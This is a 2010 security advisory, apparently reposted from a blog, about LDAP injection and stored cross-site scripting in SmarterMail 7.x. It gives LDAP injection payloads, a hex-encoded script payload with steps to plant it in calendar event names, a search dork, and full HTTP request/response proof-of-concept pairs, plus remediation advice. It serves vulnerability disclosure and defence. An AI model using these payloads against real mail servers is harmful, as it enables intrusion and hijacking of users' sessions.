SmarterMail 7.x LDAP Injection

`########################################################################  
# Vendor: smartertools.com SmarterMail 7.x (7.2.3925)  
# Date: 2010-10-01  
# Author : David Hoyt (sqlhacker) – Hoyt LLC  
# Contact : [email protected]  
# Home : http://cloudscan.me  
# Dork : insite: SmarterMail Enterprise 7.2  
# Bug : LDAP Injection + Cross Site Scripting (STORED)  
# Tested on : SmarterMail 7.x (7.2.3925) // Windows 2008 /64/R2  
# Uncoordinated Disclosure  
########################################################################  
  
ABSTRACT  
--------------------------  
It is important for application developers to penetration test  
their products prior to release in order to find potential vulnerabilities  
and correct them before fraudsters exploit them.  
  
DISCLOSURE PURPOSE  
--------------------------  
Applications for wide-scale deployment must be delivered with an exploit  
surface that is manageable.  
  
Developers failing to properly screen applications prior to release are at  
risk of uncoordinated disclosure.  
  
SECURITY COMMENTS  
--------------------------  
Server Application developers should explicitly be detailing the exploit  
surface  
modeling performed on an application as part of the software development  
lifecycle  
prior to and as part of a candidate release.  
  
System Admins need to take a trust-no-one approach when installing Server  
and Client Applications for wide-scale deployment.  
  
ENGAGEMENT TOOLS  
--------------------------  
I am using Immunity Debugger, Burp Suite Pro 1.3.08, Netsparker, Metasploit,  
NeXpose, XSS_Rays,  
FuzzDB as a baseline set of engagement tools that are being used to perform  
this analysis.  
  
This is manual testing.  
  
DISCUSSION AND ANALYSIS  
--------------------------  
SmarterMail 7.x (7.2.3925) was released on 10/1/2010 and was to have  
addressed a number of  
issues identified in CVE's  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3425  
and  
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3486  
  
There were a number of Private Advisories provided to Hoyt LLC Clients that  
were not disclosed to the public. It was our assumption that  
the level of detail and specificity would have resulted in a thourough  
scrubbing of any patches and release candidates.  
  
There are additional exploits to disclose that use a manual, multi-step  
process to confirm with picture proof.  
  
This advisory addresses LDAP Injection, Cross Site Scripting (STORED) and OS  
Injection vulnerabilities found in SmarterMail 7.x (7.2.3925).  
Additional advisories will be released as we develop a bullet proof audit  
trail.  
  
Further advisories will focus on security by obscurity in SmarterMail.  
  
My prior work focused on the URL/Parameter Combos that would deliver a Cross  
Site Scripting (STORED) exploit.  
  
My review seeks to focus on the identified URL/Param combos in SmarterMail  
7.1 that were found to be vulnerable but not disclosed to the public  
and only available in private advisories to our clients and partners.  
  
  
AUDIT TRAIL + EXPLOIT PATTERN EXAMPLES  
  
  
EXPLOIT #1  
--------------------------  
LDAP injection and resulting STORED Cross Site Scripting in Events Planner -  
SmarterMail 7.x (7.2.3925)  
  
Summary  
Severity: High  
Confidence: Certain  
Host: http://vulnerable.smartermail.site:9998  
Path: /Main/frmEmptyPreviewOuter.aspx  
Multiple Related URL/Parameters (available in private advisory)  
  
Issue detail  
The type parameter is vulnerable to LDAP injection attacks.  
  
The payloads 5faa0382d747b754)(sn=* and 5faa0382d747b754)!(sn=* were each  
submitted in the type parameter. These two requests resulted in different  
responses, indicating that the input may be being incorporated into a  
disjunctive LDAP query in an unsafe manner.  
  
Issue Background  
-----------------------  
LDAP injection arises when user-controllable data is copied in an unsafe way  
into an LDAP query that is performed by the application. If an attacker can  
inject LDAP metacharacters into the query, then they can interfere with the  
query's logic. Depending on the function for which the query is used, the  
attacker may be able to retrieve sensitive data to which they are not  
authorised, or subvert the application's logic to perform some unauthorised  
action.  
  
Note that automated difference-based tests for LDAP injection flaws can  
often be unreliable and are prone to false positive results.  
  
The author has manually reviewed the reported requests and responses and  
confirmed a vulnerability is present.  
  
All the work presented is manual recon and analysis using the tools listed.  
  
  
Step by Step Process  
---------------------------------------------------  
  
The steps to create the exploit as as follows:  
  
-Obtain an end-user SmarterMail 7.x (7.2.3925)  
-Login to WebMail, Click Events  
  
Note - The XSS attack payload can be delivered by creating an Event Group or  
an Event Name.  
  
My example will create a new event. I know that SmarterMail does some data  
sanitization, so I need to test various encoding schemes to get around the  
limited sanity checking.  
  
To make this easy to follow along, use URL http://ha.ckers.org/xss.html for  
our encoding calculator so the average Joe can leverage this exploit  
example.  
  
I want to make a simple test to confirm if the URL/Parameters are vulnerable  
in the Event Planner of SmarterMail 7.x (7.2.3925).  
I'll use a known malicious payload example. Using the encoding calculator, I  
input <\\\/script>alert(0x000170)<\\/script>  
and for the HEX Value Stored Cross Site Scripting exploit I want to create.  
  
The result is  
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%30%78%30%30%30%31%37%30%29%3C%2F%73%63%72%69%70%74%3E,  
there is your example exploit for Stored XSS.  
  
Take the result and paste it into the new event name (exploit) you want to  
create and e-mail around to all your colleages and friends and blog about...  
  
Click submit and refresh the screen, here is what I "received" for a  
payload. I provide 2 examples of URL/Parameter manipulation that result in  
an event being created.  
  
** Author Note.. the Blogger parser isn't very good about making me escape  
the nasty XSS below.. so I have to edit the post so readers don't get  
XSS'd.. Pictures are a part of the exploit surface model, I also like to  
post conclusive, picture proof of an exploit.  
  
The picture(s) below provide conclusive evidence of Cross Site Scripting  
(STORED) delivered via LDAP Injection.  
  
  
Stored Cross Site Scripting Audit Trail Picture #1 for SmarterMail 7.x  
(7.2.3925)  
LDAP Injection to leverage an XSS attack utilizing the event planner  
features of SmarterMail 7.x (7.2.3925)  
  
  
Stored Cross Site Scripting Audit Trail Picture #2 for SmarterMail 7.x  
(7.2.3925)  
LDAP Injection to leverage an XSS attack utilizing the event planner  
features of SmarterMail 7.x (7.2.3925)  
  
The implication here is that SmarterMail isn't defending against HEX Value  
malicious payloads. This is a "critical" exploit finding confirmed in  
SmarterMail 7.x (7.2.3925).  
You can keep testing with Decimal or Base 64 and produce results equal to  
and likely greater than what I am showing here in public, emphasis on  
greater than what I am showing.  
  
  
Issue Remediation  
-------------------  
If possible, applications should avoid copying user-controllable data into  
LDAP queries. If this is unavoidable, then the data should be strictly  
validated to prevent LDAP injection attacks. In most situations, it will be  
appropriate to allow only short alphanumeric strings to be copied into  
queries, and any other input should be rejected. At a minimum, input  
containing any LDAP metacharacters should be rejected; characters that  
should be blocked include ( ) ; , * | & = and whitespace.  
  
  
EXPLOIT Proof of Concept {PoC} - DETAILS  
--------------------------------------------  
  
Request 1  
GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)(sn=* HTTP/1.1  
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,  
application/x-ms-application, application/x-ms-xbap,  
application/vnd.ms-xpsdocument, application/xaml+xml, */*  
Referer: http://vulnerable.smartermail.site:9998/Default.aspx  
Accept-Language: en-us  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64;  
Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)  
Accept-Encoding: gzip, deflate  
Host: vulnerable.smartermail.site:9998  
Proxy-Connection: Keep-Alive  
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=;  
settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default;  
STTTState=;  
STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}  
  
  
  
Response 1  
HTTP/2.0 200 OK  
Server: SmarterTools/2.0.3925.24451  
Date: Fri, 01 Oct 2010 22:28:00 GMT  
X-AspNet-Version: 2.0.50727  
X-Compressed-By: HttpCompress  
Cache-Control: private  
Content-Type: text/html; charset=utf-8  
Connection: Close  
Content-Length: 5204  
  
  
...[SNIP]...  
<![CDATA[  
UpdateSidebarCounts('UserSync', 0);  
$(function() { if (parent.UpdateCurrentPage)  
parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x28sn\x253d\x2a');  
});  
Sys.Application.initialize();  
$(function() {  
SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail');  
});  
//]]>  
</script>  
</form>  
</body>  
</html>  
  
  
  
Request 2  
GET /Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)!(sn=* HTTP/1.1  
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,  
application/x-ms-application, application/x-ms-xbap,  
application/vnd.ms-xpsdocument, application/xaml+xml, */*  
Referer: http://vulnerable.smartermail.site:9998/Default.aspx  
Accept-Language: en-us  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64;  
Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)  
Accept-Encoding: gzip, deflate  
Host: vulnerable.smartermail.site:9998  
Proxy-Connection: Keep-Alive  
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=;  
settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default;  
STTTState=;  
STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}  
  
  
  
Response 2  
HTTP/2.0 200 OK  
Server: SmarterTools/2.0.3925.24451  
Date: Fri, 01 Oct 2010 22:28:00 GMT  
X-AspNet-Version: 2.0.50727  
X-Compressed-By: HttpCompress  
Cache-Control: private  
Content-Type: text/html; charset=utf-8  
Connection: Close  
Content-Length: 5247  
  
  
...[SNIP]...  
<![CDATA[  
UpdateSidebarCounts('UserEmail', 0);  
UpdateSidebarCounts('UserSync', 0);  
$(function() { if (parent.UpdateCurrentPage)  
parent.UpdateCurrentPage('\x2fMain\x2ffrmEmptyPreviewOuter\x2easpx?type\x3d5faa0382d747b754\x29\x21\x28sn\x253d\x2a');  
});  
Sys.Application.initialize();  
$(function() {  
SetTopTitle('No\x20item\x20has\x20been\x20selected\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail');  
});  
//]]>  
  
  
  
EXPLOIT #2  
--------------------------  
Directory Creation by Fuzzing that results in a STORED Cross Site Scripting  
attack.  
  
This portion of the research focused on creating direcories that would evade  
the current filtering techniques used my SmarterMail to prevent OS Injection  
  
  
  
WORKAROUNDS  
--------------------------  
Specifically, URL filtering should be employed against the malicious query  
strings.  
  
  
  
REMEDIATION SOLUTION  
------------------------  
  
I'm pushing a quick update to my clients now on this LDAP Injection / Stored  
XSS issue..  
Our group is studying a remediation solution or additional workarounds that  
will be posted at this URL.  
  
Calender and Event functionality is not straightforward to implement  
securely.  
Some recommendations to consider in the design of this functionality  
include:  
  
Validating Input and a blacklist of strings to hinder this style of attack.  
  
There is more to the story.. since I'm just screening applications for  
clients, I am pushing out the info as I confirm it manually.  
  
  
  
  
  
`